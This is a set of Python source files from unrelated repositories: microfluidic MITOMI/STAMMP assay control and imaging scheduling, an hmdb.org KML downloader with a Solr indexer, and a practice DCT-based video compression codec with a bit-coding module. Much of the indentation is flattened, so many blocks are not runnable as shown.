Referenced Times (s): {}, Delay Times (s): {}, Note: {}'.format(*paramVals)
return '>> Kinetic Acquisition Parameters: {}'.format(params)
def startAssay(self, data_dir, position_list, scanQueueFlag = False):
"""Brings the stage home, schedules the scans, then starts the image acquisitions
Args:
data_dir (str): directory to write image folder
            position_list (pd.DataFrame): stage position list
scanQueueFlag (bool): flag to add scan to the common scan queue
Returns:
None
"""
kineticSubfolder = '{}_{}'.format(time.strftime("%Y%m%d_%H%M%S",
time.localtime()),
self.note.replace(" ", "_")
)
kineticDirectory = os.path.join(data_dir, kineticSubfolder)
os.makedirs(kineticDirectory)
eh.acquilogger.info(self.__str__())
eh.acquilogger.info('Kinetic acquisition started: ' + str(self.note.replace(" ", "_")))
        delaysToQueue = [0] + list(self.delayTimes)
scanQueue = Queue()
list(map(lambda k: scanQueue.put(k), delaysToQueue))
lastScanTime = time.time()
        while not scanQueue.empty():
            nextScanDelay = scanQueue.get()
            deltaTime = (nextScanDelay + lastScanTime) - time.time()
            if deltaTime > 0:
                time.sleep(deltaTime)
            lastScanTime = time.time()
            scanArgs = [kineticDirectory,
                        self.channelsExposures,
                        self.device,
                        self.note.replace(" ", "_"),
                        position_list]
            if scanQueueFlag:
                # dispatch to the shared hardware queue for concurrent imaging
                hardwareQueue.put((scanArgs, {}))
            else:
                scan(*scanArgs)
eh.acquilogger.info('Kinetic Read Complete')
|
FordyceLab/RunPack-STAMMP | runpack-stammp/mitomiprotocols.py | # description : STAMMP protocols for experimental acquisition
# authors : <NAME>, <NAME>
# date : 20180520
# version update : 20200913
# version : 0.1.1
# python_version : 2.7
import time
from Queue import Queue
import numpy as np
from apscheduler.schedulers.background import BackgroundScheduler
from apscheduler.schedulers.blocking import BlockingScheduler
from runpack import valvecontrol as vc
from runpack import imagingcontrol as ic
from runpack.io import HardwareInterface as hi
from runpack.io import ExperimentalHarness as eh
################################################################################
def patternDevices(devices, inletNames = None, blocknames = None):
"""Performs device surface patterning
Performs patterning on passed list of devices assuming standard input line
configuration (bBSA in 'bb', NeutrAvidin in 'NA', antibody in 'pHis', and
PBS in 'Hepes'). Be sure to attach a "waste tail" to the device, and open
all lines to pressure before executing.
    Custom inlet names should be of the form {'na': [na_renamed], 'ph':
    [ph_renamed], 'bb': [bb_renamed], 'hep': [hep_renamed], 'w': [w_renamed]}
    Custom blocknames should be of the form ['bn1', 'bn2', 'bn3', ..., 'bnn']
    Blocks opening/closing will occur with inlet opening/closing. See the
    hedged usage sketch after this function.
    Args:
        devices (list): list of devices to be patterned, lowercase (e.g.
            ['d1', 'd2', 'd3'])
        inletNames (dict): remapped inlet names containing precisely {'w': [
            w_renamed], 'na': [na_renamed], 'ph': [ph_renamed],
            'bb': [bb_renamed], 'hep': [hep_renamed]}. Should not contain a trailing index.
        blocknames (list): block control valve names of the form ['c1', 'c2', ..., 'cn'].
            Valve names should not contain a trailing device index.
Returns:
None
"""
    wasteValve = ['w']
    buttonValves = ['b1', 'b2']
    sandwichValves = ['s1', 's2']
    inletValve = ['in']
    outlet = ['out']
naValve = ['na']
antibodyValve = ['ph']
bbsaValve = ['bb']
bufferValve = ['hep']
if inletNames:
wasteValve = inletNames['w']
naValve = inletNames['na']
antibodyValve = inletNames['ph']
bbsaValve = inletNames['bb']
bufferValve = inletNames['hep']
if blocknames:
inletValve = inletValve + blocknames
vc.returnToSafeState(devices) # Closing all valves
eh.scriptlogger.info('>> 1/18. Starting Device Patterning for devices {}. \
Starting with all valves closed. NOTE: flow of non-biotinylated BSA \
should have already been done'.format(devices))
eh.scriptlogger.info('2/18. Opening sandwiches, outlet, bBSA inlet, and waste. \
Flushing bBSA through inlet tree to waste for 30s')
vc.openValves(devices, sandwichValves + outlet + bbsaValve + wasteValve)
time.sleep(30)
eh.scriptlogger.info('3/18. Done Flushing bBSA to waste. Flushing bBSA through \
devices with buttons closed for 5min')
vc.closeValves(devices, wasteValve)
vc.openValves(devices, inletValve)
time.sleep(300)
eh.scriptlogger.info('4/18. Opened buttons with bBSA flowing through devices to waste for 35min')
vc.openValves(devices, buttonValves)
time.sleep(2100)
eh.scriptlogger.info('5/18. Done Flowing bBSA through devices and closed inlet. \
Flushing PBS through inlet tree to waste for 30s')
vc.closeValves(devices, bbsaValve + inletValve)
vc.openValves(devices, bufferValve + wasteValve)
time.sleep(30)
eh.scriptlogger.info('6/18. Done flowing PBS to waste. Flushing PBS through device \
with buttons open for 10min')
vc.closeValves(devices, wasteValve)
vc.openValves(devices, inletValve)
time.sleep(600)
eh.scriptlogger.info('7/18. Done flushing PBS through devices. \
Flowing neutravidin through inlet tree to waste for 30s')
vc.closeValves(devices, bufferValve + inletValve)
vc.openValves(devices, naValve + wasteValve)
time.sleep(30)
eh.scriptlogger.info('8/18. Done flushing Neutravidin to waste. \
Flowing Neutravidin through devices with buttons open for 30min')
vc.closeValves(devices, wasteValve)
vc.openValves(devices, inletValve)
time.sleep(1800)
eh.scriptlogger.info('9/18. Done flowing Neutravidin through devices. \
Flowing PBS through devices with buttons open for 10min')
vc.closeValves(devices, naValve)
vc.openValves(devices, bufferValve)
time.sleep(600)
eh.scriptlogger.info('10/18. Done flowing PBS through devices and closed buttons. \
Flowing bBSA through the device for another 35min (quench walls only)')
vc.closeValves(devices, bufferValve + buttonValves)
vc.openValves(devices, bbsaValve)
time.sleep(2100)
eh.scriptlogger.info('11/18. Done flowing bBSA through devices. \
Flowing PBS through the device for 10min. **NEXT STEP IS ANTIBODY FLOWING**')
vc.closeValves(devices, bbsaValve)
vc.openValves(devices, bufferValve)
time.sleep(600)
eh.scriptlogger.info('12/18. Done flowing PBS through devices and closed inlet. \
Flowing Antibody through inlet tree to waste for 30s')
vc.closeValves(devices, bufferValve + inletValve)
vc.openValves(devices, antibodyValve + wasteValve)
time.sleep(30)
eh.scriptlogger.info('13/18. Done flowing Antibody through inlet tree. Flowing \
Antibody through device for 2min')
vc.closeValves(devices, wasteValve)
vc.openValves(devices, inletValve)
time.sleep(120)
eh.scriptlogger.info('14/18. While flowing Antibody through devices, opened buttons. \
Flowing for 13.3min')
vc.openValves(devices, buttonValves)
time.sleep(800)
eh.scriptlogger.info('15/18. Closed buttons while flowing Antibody through device for 30s')
vc.closeValves(devices, buttonValves)
time.sleep(30)
eh.scriptlogger.info('16/18. Done flowing Antibody through device. Flowing PBS through \
inlet tree to waste for 30s')
vc.closeValves(devices, antibodyValve + inletValve)
vc.openValves(devices, bufferValve + wasteValve)
time.sleep(30)
eh.scriptlogger.info('17/18. Done flowing PBS to waste. Flowing PBS through device for 10min')
vc.closeValves(devices, wasteValve)
vc.openValves(devices, inletValve)
time.sleep(600)
eh.scriptlogger.info('18/18. Closed the outlets')
vc.closeValves(devices, outlet)
eh.scriptlogger.info('>> Done with device patterning')
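# Hedged usage sketch (added; not in the original source). Default inlet
# naming, patterning two devices:
#   patternDevices(['d1', 'd2'])
# With remapped inlets (hypothetical names, no trailing device index):
#   patternDevices(['d1'], inletNames={'w': ['w'], 'na': ['neu'], 'ph': ['ab'],
#                                      'bb': ['bbsa'], 'hep': ['pbs']})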
def flowSubstrateStartAssay(deviceName, substrateInput, KineticAcquisition,
equilibrationTime = 600, treeFlushTime = 20, postEquilibrationImaging = False,
performImaging = True, postEquilibImageChanExp = {'4egfp':[500]}, scanQueueFlag = False):
"""Performs a standard enzyme turnover assay.
Flows substrate, exposes buttons and closes sandwiches,
performs imaging at specified timesteps
Rev. 102817, DM
    Args:
        deviceName (str): name of device
        substrateInput (str): valve name of the substrate input (with trailing device index)
        KineticAcquisition (KineticAcquisition): acquisition object driving the assay timings
        equilibrationTime (int): time (s) to equilibrate the device before the assay
        treeFlushTime (int): time (s) to pre-flush the inlet tree
        postEquilibrationImaging (bool): flag to image the chip after equilibration
        performImaging (bool): flag to run the kinetic acquisition
        postEquilibImageChanExp (dict): channels/exposures for the post-equilibration image
        scanQueueFlag (bool): flag to dispatch scans to the common hardware queue
    Returns:
        None
"""
sendToQueue = scanQueueFlag
inputValve = substrateInput[:-1]
eh.scriptlogger.info('>> Flowing substrate, starting assay for \
device {} in lines {}'.format(deviceName, str(substrateInput)))
deviceNumber = str(deviceName[-1])
#Flush the inlet tree
eh.scriptlogger.info('The inlet tree wash started for substrate in ' + str(substrateInput))
vc.returnToSafeState([deviceName])
vc.openValves([deviceName], [inputValve, 'w'])
time.sleep(treeFlushTime)
eh.scriptlogger.info('The inlet tree wash done for substrate in ' + str(substrateInput))
#Expose chip to substrate, equilibrate for equilibrationTime
eh.scriptlogger.info('Chip equilibration started for substrate in ' + str(substrateInput))
if inputValve == 'w': #For the instance where the waste line is the input
pass
else:
vc.closeValves([deviceName], ['w'])
vc.openValves([deviceName], ['in', 'out', 's1', 's2'])
time.sleep(equilibrationTime)
eh.scriptlogger.info('Chip equilibration done for substrate in ' + str(substrateInput))
if postEquilibrationImaging:
if sendToQueue == True:
args = [eh.rootPath,
postEquilibImageChanExp,
deviceName,
KineticAcquisition.note.replace(" ", "_")+'_PreAssay_ButtonQuant',
eh.posLists[deviceName]]
            kwargs = {'wrappingFolder': True}
ic.hardwareQueue.put((args, kwargs))
else:
ic.scan(eh.rootPath,
postEquilibImageChanExp,
deviceName,
KineticAcquisition.note.replace(" ", "_")+'_PreAssay_ButtonQuant',
eh.posLists[deviceName],
wrappingFolder = True)
#Close things to prep for assay, and open buttons
vc.closeValves([deviceName], [substrateInput[:-1], 'in', 'out', 's1', 's2'])
time.sleep(0.5)
vc.openValves([deviceName], ['b1', 'b2'])
#Start the assay
if performImaging:
KineticAcquisition.startAssay(eh.rootPath,
eh.posLists[deviceName],
scanQueueFlag = sendToQueue)
def makeAssayTimings(numLinearPoints = 5, totalPoints = 15, scanTime = 90, totalTime = 3600):
    """Generate assay scan delay times: numLinearPoints linearly spaced scans
    of scanTime seconds each, followed by log-spaced delays chosen so the
    whole assay spans approximately totalTime seconds.
    Args:
        numLinearPoints (int): number of initial, linearly spaced scans
        totalPoints (int): total number of scans
        scanTime (int): single scan time (s), also the linear spacing
        totalTime (int): target total assay time (s)
    Returns:
        list: delay times (s) between consecutive scans
    """
logPoints = totalPoints - numLinearPoints
baseTimes = []
    pointDensity = 1
    pointDensityIncrement = 0.002
    # grow the log-spacing exponent until the schedule just exceeds totalTime
    while sum(baseTimes) < totalTime:
        pointDensity += pointDensityIncrement
        baseTimes = [scanTime] * numLinearPoints
        logTimings = list(np.logspace(np.log10(scanTime),
                          np.log10(float(scanTime)**pointDensity),
                          num=logPoints,
                          dtype=int))
        baseTimes.extend(logTimings)
    # rebuild with the last exponent that kept the schedule under totalTime
    baseTimes = [scanTime] * numLinearPoints
    logTimings = list(np.logspace(np.log10(scanTime),
                      np.log10(float(scanTime)**(pointDensity-pointDensityIncrement)),
                      num=logPoints,
                      dtype=int))
    baseTimes.extend(logTimings)
return baseTimes
def flushInletTree(deviceNames, inputInlet, vacantInlets, flushTime):
    """Flush the inlet tree from inputInlet out through each vacant inlet,
    nearest to farthest, washing each for flushTime seconds.
    Args:
        deviceNames (list): devices whose inlet trees are flushed
        inputInlet (str): inlet supplying the wash fluid
        vacantInlets (list): unused inlets to flush through
        flushTime (int): wash time (s) per vacant inlet
    Returns:
        None
    """
# Close all the inlets AND the tree inlet (make no assumptions)
allInputs = ['hep', 'prot', 'ext2', 'ext1', 'ph', 'na', 'bb', 'w']
vc.closeValves(deviceNames, allInputs + ['in'])
indexes = range(len(allInputs))
indexesInputs = dict(zip(allInputs, indexes))
inputIndex = indexesInputs[inputInlet]
# Get the distance from the inputInlet to the vacantInlet mapped to the vacantInlet ID
vacantInletsOrganized = {}
for inlet in vacantInlets:
vacantInletsOrganized[abs(indexesInputs[inlet] - inputIndex)] = [inlet] # distance->port
vc.openValves(deviceNames, [inputInlet])
# Now from close to far, open the valve and wash for the flushTime
for inlet in sorted(vacantInletsOrganized.keys()):
vc.openValves(deviceNames, vacantInletsOrganized[inlet])
time.sleep(flushTime)
vc.closeValves(deviceNames, vacantInletsOrganized[inlet])
# Close all the inlets AND the tree inlet (again, make no assumptions)
vc.closeValves(deviceNames, [inputInlet])
|
FordyceLab/RunPack-STAMMP | runpack-stammp/assays.py | # title : assays.py
# description : Standard MITOMI Concurrent Imaging
# authors : <NAME>
# credits : <NAME>
# date : 20180520
# version update : 20200913
# version : 0.1.1
# python_version : 2.7
import time
from Queue import Queue
from apscheduler.schedulers.background import BackgroundScheduler
from runpack.io import HardwareInterface
from runpack.io import ExperimentalHarness as eh
from runpack import imagingcontrol as imaging
from runpack import mitomiprotocols as protocols
class Assay:
def __init__(self, dname, experimentalObject, inletPort, channelsExposures, assayTimesName, description,
equilibrationTime = 480, treeFlushTime = 15, postEquilibrationImaging = True, forConcurrency = False):
"""
Kinetic assay
Arguments:
(str) dname: device name ('d1' | 'd2' |'d3')
(ExperimentalHarness) experimentalObject:
(str) inletPort: name of port bearing substrate/reagent
(dict) channelsExposures: Dictionary of channels mapped to exposures
(e.g., {'2bf':[50, 500], '1pbp':[100, 200]})
(str) assayTimesName: Name of assay timing delay times in ExperimentalHarness
(str) description: Assay description
(int) equilibrationTime: Time (s) to equilibrate reaction chambers with substrate/reagent
(int) treeFlushTime: Time (s) to pre-flush the inlet tree with substrate/reagent
(bool) postEquilibrationImaging: flag to acquire chip image following equilibration
(bool) forConcurrency: flag to execute assay as part of concurrent imaging
Returns:
None
"""
self.dname = dname
self.description = description
self.inletPort = inletPort
self.experimentalObject = experimentalObject
self.assayTimesName = assayTimesName
self.forConcurrency = forConcurrency
self.channelsExposures = channelsExposures
self.assayParams = {'equilibrationTime': equilibrationTime, 'treeFlushTime': treeFlushTime,
'postEquilibrationImaging': postEquilibrationImaging}
self.acquisitionObject = imaging.KineticAcquisition(dname, channelsExposures,
experimentalObject.assayTimes[assayTimesName], description)
self.testParams()
def startAssay(self):
"""
Start kinetic assay
Arguments:
None
Returns:
None
"""
protocols.flowSubstrateStartAssay(self.dname, self.inletPort, self.acquisitionObject,
equilibrationTime = self.assayParams['equilibrationTime'], treeFlushTime = self.assayParams['treeFlushTime'],
postEquilibrationImaging = self.assayParams['postEquilibrationImaging'], scanQueueFlag = self.forConcurrency)
def testParams(self):
"""
Assay parameter error checking
Arguments:
None
Returns:
None
"""
if not self.dname in self.experimentalObject.posLists.keys():
raise ValueError('Device name incorrect or not added to experimental object')
if not self.inletPort[-1] == self.dname[-1]:
raise ValueError('Your inlet port either lacks a trailing digit or is for another device')
for channel in self.channelsExposures.keys():
if not channel in HardwareInterface.channels:
raise ValueError('Channel {} does not exist for hardware'.format(channel))
if not self.assayTimesName in self.experimentalObject.assayTimes:
raise ValueError('The AssayTimes name specified does not exist in experimental object. Check your spelling.')
class AssaySeries:
def __init__(self, assayList, offsets = None):
"""
General-purpose assay series.
Arguments:
(list) assayList: list of assays objects to start, in order
(list) offsets: list of assay start delay offsets (int)
Returns:
None
"""
self.dname = assayList[0].dname
self.assayList = assayList
self.assayQueue = self.scheduleAssays()
self.assayParams = self.assayList[0].assayParams
self.offsets = offsets
def scheduleAssays(self):
"""
Queue up assays for execution.
Arguments:
None
Returns:
(Queue) Queue of assays to perform
"""
assayQueue = Queue()
list(map(lambda k: assayQueue.put(k), self.assayList))
return assayQueue
def startAssays(self, scanQueueFlag = False):
"""
Start execution of the assay series
Arguments:
(bool) scanQueueFlag: flag to dequeue assays to the common scanqueue
Returns:
None
"""
if not self.offsets:
while not self.assayQueue.empty():
nextAssay = self.assayQueue.get()
nextAssay.startAssay()
else:
while not self.assayQueue.empty():
for offset in self.offsets:
time.sleep(offset)
nextAssay = self.assayQueue.get()
nextAssay.startAssay() #Except the backgrounded version
imaging.hardwareState += 1
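# Hedged usage sketch (added; not in the original source; the inlet and
# assay-times names are illustrative). Run two assays back to back on d1:
#   a1 = Assay('d1', eh, 'ext11', {'4egfp': [500]}, 'fast', 'substrate A')
#   a2 = Assay('d1', eh, 'ext21', {'4egfp': [500]}, 'fast', 'substrate B')
#   AssaySeries([a1, a2]).startAssays()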
class RiffledAssaySeries:
def __init__(self, assaySeriesDict):
"""
A Riffled (scheduled) Assay Series Class
Not yet implemented
"""
self.assaySeriesDict = assaySeriesDict
# self.initialOffset = self.calculateInitialOffset()
# self.otherOffsets = self.calculateOtherOffsets()
self.assaySchedules = self.scheduleRiffle()
def calculateInitialOffset(self):
"""
To be implemented
"""
return
def calculateOtherOffsets(self):
"""
To be implemented
"""
return
def startAssays(self):
"""
To be implemented
"""
imaging.hardwareBlockingFlag = True
imaging.hardwareState = 0
self.assaySchedules.resume()
time.sleep(0.2)
self.assaySchedules.resume_job('d1')
print('d1 jobs resumed')
time.sleep(0.2)
self.assaySchedules.resume_job('d2')
print('d2 jobs resumed')
imaging.startHardwareQueue()
        self.assaySchedules.shutdown()
return
def scheduleRiffle(self):
"""
To be implemented
"""
startAssaySeries = lambda series: series.startAssays()
backgroundConfig = {'logger': eh.scriptlogger}
s = BackgroundScheduler(gconfig=backgroundConfig)
s.start()
s.pause()
for dname, assaySeries in self.assaySeriesDict.items():
assayArgs = [assaySeries]
s.add_job(startAssaySeries, id = dname, misfire_grace_time = 100, args = assayArgs, next_run_time = None)
return s
|
worleydl/solr-spatial-viz | indexer/fetcher.py | <reponame>worleydl/solr-spatial-viz<filename>indexer/fetcher.py<gh_stars>1-10
import urllib
baseUrl = "http://www.hmdb.org/gpx/kml.asp?State=%s"
with open('states.txt') as f:
content = f.readlines();
for state in content:
state = state.strip();
kml = urllib.URLopener()
print "Retreiving %s" % state
kml.retrieve(baseUrl % state, "data/%s.kml" % state)
|
worleydl/solr-spatial-viz | indexer/ingester.py | <reponame>worleydl/solr-spatial-viz<gh_stars>1-10
import urllib2
import xml.etree.ElementTree as ET
with open('states.txt') as f:
states = f.readlines();
for state in states:
state = state.strip()
print state
tree = ET.parse('data/%s.kml' % state)
root = tree.getroot()
invalidIds = [None, 'HMdb']
namespace = '{http://www.opengis.net/kml/2.2}'
solr = "http://localhost:8983/solr/hmdb/update"
# Document
for child in root:
# Placemark
for pm in child:
docId = pm.get('id');
if docId not in invalidIds:
name = pm.find('%sname' % namespace).text
desc = pm.find('%sdescription' % namespace).text
point = pm.find('%sPoint' % namespace)
coords = point.find('%scoordinates' % namespace).text[:-2]
coords = coords.split(',')
coords = "%s,%s" % (coords[1], coords[0])
add_xml = ET.Element('add');
xdoc = ET.SubElement(add_xml, 'doc')
field = ET.Element('field', name='id')
field.text = docId
xdoc.append(field)
field = ET.Element('field', name='name')
field.text = name
xdoc.append(field)
field = ET.Element('field', name='description')
field.text = desc
xdoc.append(field)
field = ET.Element('field', name='coords')
field.text = coords
xdoc.append(field)
try:
request = urllib2.Request(solr)
request.add_header('Content-Type', 'text/xml; charset=utf-8');
request.add_data(ET.tostring(add_xml))
response = urllib2.urlopen(request).read()
except:
print "Invalid location: %s %s" % (docId, name)
|
jack04060201/data-compression-practice | DC.py | import cv2 as cv,numpy as np, copy, time
#from sklearn.cluster import KMeans
from matplotlib import pyplot as plt
import code_t as cd
###############
blocksize =[8,8]
Q_m=np.float32(
[[ [16,11,10,16,24,40,51,61],
[12,12,14,19,26,58,60,55],
[14,13,16,24,40,57,69,56],
[14,17,22,29,51,87,80,62],
[18,22,37,56,68,109,103,77],
[24,35,55,64,81,104,113,92],
[49,64,78,87,103,121,120,101],
[72,92,95,98,112,100,103,99]],##Y
[ [17,18,24,47,99,99,99,99],
[18,21,26,66,99,99,99,99],
[24,26,56,99,99,99,99,99],
[47,66,99,99,99,99,99,99],
[99,99,99,99,99,99,99,99],
[99,99,99,99,99,99,99,99],
[99,99,99,99,99,99,99,99],
[99,99,99,99,99,99,99,99]]])##UV
frame_global=np.float32([])
M=0
#intra frame
#inter frame
n_mv=(0,0)
n_d=10000
my,mx=0,0
set={'dc':[],'ac':[]}
###############
def find_mv(block,x,y,p=0):
global frame_global,n_mv,n_d,my,mx
br,bc,bch=np.int32(block.shape)
r,c,clrc= np.int32(frame_global.shape)-np.int32(block.shape)
#print(r,c) #64-120
for i in range((y-1)*br,(y+1)*br):
for j in range((x-1)*bc,(x+1)*bc):
if(i >= 0 and j >= 0 and i < r and j<c):
#print(frame_global[i:i+br,j:j+bc,:]-block)
d = np.sum(np.abs(frame_global[i:i+br,j:j+bc,:]-block))
if n_d > d:
n_d = d
mx=j
my=i
n_mv=(y*blocksize[0]-my,x*blocksize[1]-mx)
if p==1: print(n_d,n_mv,(my,mx))
#return my,mx
def nearest_mv(mv,d,my,mx):
global n_mv,n_d
r=False
if d < n_d:
n_mv = mv
n_d = d
print(n_d,mv,my,mx)#x:bks,y:bks,mv:pixel
r=True
return n_d,r
def bksp(frame,bksize,funcs):
global n_mv,n_d,my,mx
if funcs[0]== find_mv: n_d=10000
m=1 if remix in funcs else 0
r,c,clrc= np.int32(np.array(frame.shape)/[bksize[0],bksize[1],1])
#print(r,c)
for i in range(0,r):
print('\t\t\t\t\t',i,'/',r-1,end='\r', flush=True)
for j in range(0,c):
p=0;
bk=frame[bksize[0]*i:bksize[0]*(i+1),bksize[1]*j:bksize[1]*(j+1),:]
if i==j and j==2:
p=0
for func in funcs:
if func==DCT: bk=func(bk,p=0,m=m)
elif (func == rebuild) or func == remix: func(idct=bk,i=i,j=j,bksize=bksize)
elif func == find_mv: func(bk,x=j,y=i,p=0)
'''if funcs[0]== find_mv:
print("n_mv",n_mv)
print("(my,mx)",(my,mx))
print("frame_global",np.array([my,mx]),np.array([my,mx])+np.array(bksize))
print("frame",np.array([my,mx])-np.array(n_mv),np.array([my,mx])-np.array(n_mv)+np.array(bksize))
show(frame_global[my:(my+bksize[0]),mx:(mx+bksize[1]),:],m=1,t=1,sc=40,s=1)
show(frame[my-n_mv[0]:(my+bksize[0])-n_mv[0],mx-n_mv[1]:(mx+bksize[1])-n_mv[1]],m=1,t=2,sc=40)'''
def shift(frame):
global n_mv
#print("shift",n_mv)
#show(frame,m=1,t=1)
frames=copy.deepcopy(frame)
#show(frames,m=1,t=2)
w,h,chl=frame.shape
ty=n_mv[0] if n_mv[0] >= 0 else 0
by=w if n_mv[0] >= 0 else n_mv[0] + w
lx=n_mv[1] if n_mv[1] >= 0 else 0
rx=h if n_mv[1] >= 0 else n_mv[1] + h
frames[ty:by,lx:rx,:]=frame[ty-n_mv[0]:by-n_mv[0],lx-n_mv[1]:rx-n_mv[1],:]
# show(frames,m=1,t=3)
return frames
def show(frame,s=None,t="T",m=0,sc=1):
r,c,chl=frame.shape
if m==1:
frame=cv.cvtColor(frame.astype('uint8'), cv.COLOR_YUV2BGR_YUY2)
if sc!=1:
frame=cv.resize(frame,(int(sc*c),int(sc*r)),interpolation=cv.INTER_LINEAR)
cv.imshow(str(t),frame)
cv.waitKey(s)
def DCT(bk,p=0,m=0):
r,c,chl = np.int32(bk.shape)
dct,idct,Qa,dQa=np.zeros([r,c,chl]),np.zeros([r,c,chl]),np.zeros([r,c,chl]),np.zeros([r,c,chl]);
for i in range(0,chl):
dct[:,:,i]=cv.dct(bk[:,:,i])
Qa[:,:,i]=np.int32(Q(dct[:,:,i],l=i))
f=Qa[:,:,i].flatten()
if m>=0:
#code(f[0],"ac")
#f=np.delete(f,0)
#print(f)
cd.code_reset()
zigzag(Qa[:,:,i].astype(np.int32),(r,c),cd.bks.append)
#print(cd.bks)
cd.code_block(np.int32(cd.bks))
#print('\t\t\tsize:',len(cd.fin),end='\r',flush=True)
#if len(cd.fin)<200: print(cd.fin)
#else:
dQa[:,:,i]=deQ(Qa[:,:,i],l=i)
idct[:,:,i]=cv.idct(dQa[:,:,i])
if p==1:
print(dct[:,:,0])
print(Qa[:,:,0])
print(dQa[:,:,0])
print(idct[:,:,0])
return idct
def Q(dct,l=0):
return dct/Q_m[l]
def deQ(Qa,l=0):
return Qa*Q_m[l]
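# Hedged numeric example (added; not in the original source): Q_m[0][0,0] is
# 16, so a luma DC coefficient of 100.0 quantizes to int(100/16) = 6 and
# dequantizes back to 6*16 = 96 -- the lossy step of this codec.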
def rebuild(idct,i,j,bksize):
global frame_global
frame_global[bksize[0]*i:bksize[0]*(i+1),bksize[1]*j:bksize[1]*(j+1),:]=idct
def remix(idct,i,j,bksize):
global frame_global
frame_global[bksize[0]*i:bksize[0]*(i+1),bksize[1]*j:bksize[1]*(j+1),:]=idct+frame_global[bksize[0]*i:bksize[0]*(i+1),bksize[1]*j:bksize[1]*(j+1),:]
def YUV422(frame):#
r,c,chl = np.int32(frame.shape)
uv=np.zeros([r,c])
y,u,v=cv.split(frame)
u = cv.resize(u, (c//2, r), interpolation=cv.INTER_LINEAR)
v = cv.resize(v, (c//2, r), interpolation=cv.INTER_LINEAR)
y = np.round(y).astype(np.uint8)
u = np.round(np.clip(u, 0, 255)).astype(np.uint8)
v = np.round(np.clip(v, 0, 255)).astype(np.uint8)
uv[:, 0::2] = u
uv[:, 1::2] = v
return np.dstack((y, uv)).astype('uint8')
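# Hedged note (added for clarity): YUV422() packs planar YUV into a 2-channel
# YUY2-style layout -- channel 0 holds Y, channel 1 alternates U,V across
# columns -- which is why show() converts with cv.COLOR_YUV2BGR_YUY2.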
def zigzag(arr,blocksize,func=print):
    N=blocksize[0]  # assumes a square (N x N) block
i,j,d=0,0,False
for n in range(N):
func(arr[i,j])
for s in range(n):
i+= 1 if d else -1
j+= -1 if d else 1
func(arr[i,j])
if d: i+=1
else: j+=1
d= not d
i+= 1 if d else -1
j+= -1 if d else 1
for n in range(N-2,-1,-1):
func(arr[i,j])
for s in range(n):
i+= 1 if d else -1
j+= -1 if d else 1
func(arr[i,j])
if d: j+=1
else: i+=1
d= not d
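# Hedged example (added; not in the original source): traversal order produced
# by zigzag() on a 4x4 row-major block, collecting values with list.append:
#   order = []
#   zigzag(np.arange(16).reshape(4, 4), (4, 4), order.append)
#   order == [0, 1, 4, 8, 5, 2, 3, 6, 9, 12, 13, 10, 7, 11, 14, 15]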
############################################################
def main():
global frame_global,M
cam = cv.VideoCapture('MOV10s.mp4')
f_c=0
cd.clear_file()
while cam.isOpened():
ret,frame = cam.read()#BGR
if not ret: break
f_c+=1
#for f in range(0,2):###############
#print(f)if M==0:
# frame=cv.imread(str(f)+'.jpg') #<-------
frame = cv.resize(frame, (512, 288))
#frame = cv.resize(frame, (128, 72))
print("第",f_c,"幀,","%.2f" %(f_c/30),"秒",flush=True)
#show(frame,t="1")
frame=YUV422(cv.cvtColor(frame, cv.COLOR_BGR2YUV))
frame_global.resize(frame.shape)
if M==1:
#print("Find")
bksp(frame,blocksize,[find_mv])
#show(frame,m=1,t=2) #<-------
#show(shift(frame),m=1,t=1) #<-------
#print("Shift")
framesh=shift(frame)
frame=framesh-frame_global
#print(np.sum(frame))
#if np.sum(frame) > frame.shape[0]*frame.shape[1]*64:#1/4
# M=0
#else:
#print("P-frame")
#cd.code_mv(n_mv)
bksp(frame.astype(np.float32),blocksize,[DCT,remix])
if M==0:
#print("I-frame")
frame=np.float32(frame)
bksp(frame,blocksize,[DCT,rebuild])
#M=1
cd.write_file(cd.fin)
cd.fin=''
#show(frame_global,m=1,s=1,sc=10)
if __name__ == "__main__":
main() |
jack04060201/data-compression-practice | code_t.py | <filename>code_t.py
import numpy as np,math,struct
z_count=0
#DC:127 \ 7
#AC:+-64 / bits
EOB=8
cb={
'0':1,
'10':2,
'110':3,
'1110':4,
'11110':5,
    '111110':6, # block is 8*8, so a zero run is at most 63 long
    '1111110':7, # DC value at most 127
'11111110':EOB #EOB
}
temp=''
test='101011010101110100001001'
fin=''
bks=[]
frame=[]
ct=0
mv=[]
testbks=np.int32([59, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
rebuild=np.int32([])
#I-frame: send 'I' -> send DC value -> send difference values
#P-frame: send 'P' -> send difference values  2bs | x2 | 3bs| 5 | 1bs| x1 | 3bs| 4 | 1bs| x0 | 2bs| -2 |
#Difference coding: send bit-length of zero run -> zero run -> bit-length of value -> value
#  e.g. 0 0 5 0 4 -2 -> 10 | 10 | 110| 101| 0 | 1 | 110| 100| 0 | 0 | 10 | 01 | 24bits
# DC AC
def code_reset():
global bks,temp,z_count
bks=[]
temp=''
z_count=0
def split(s):
return [char for char in s]
def code_block(bk,m=0):
global ct,fin
ct =0
#print(bk)
for c in bk:
ct+=1
send_code(code(c))
#print(ct)
#if ct<64:
# print(ct)
send_code(list(cb)[EOB-1])#EOB
if len(fin)%8 != 0:
send_code((8-(len(fin)%8))*'1')
def code_mv(mv):
global fin
send_code(code(mv[0],sk_z=True))
send_code(code(mv[1],sk_z=True))
send_code(list(cb)[EOB-1])#EOB
if len(fin)%8 != 0:
send_code((8-(len(fin)%8))*'1')
def code(N,m=0,sk_z=False):
global z_count,fin,cb
#print(N,m)
if m==2:
return list(cb)[N-1]
if N==0 and m==0:
if m==0: z_count+=1; return -1
else:
if N==0 and sk_z and m==1: send_code('00'); return -1
r=int(math.log2(abs(N)))+1
if not sk_z:
send_code(code(z_count,m=1,sk_z=True))
z_count=0
send_code(code(r,m=2))
b=(pow(2,r)-1-abs(N)) if (N < 0 and m==0) else N
return format(b, '0'+str(r)+'b')
def send_code(b):
global fin
#print(b)
if b != -1 : fin += str(b); #print(str(b))
def match(b):
global temp,cb
#print('t',temp[:10],b)
temp+=b
if temp in cb:
c=cb[temp]
#print("bits:",c)
temp=''
return c
return -1
def decode(code,m=0):
global rebuild,mv
l=len(code)
b=int(code,2)
b=-(pow(2,l)-b-1) if code[0] == '0' and m==0 else b
#print(code,b)
if m==0: rebuild=np.hstack([rebuild , int(b)])
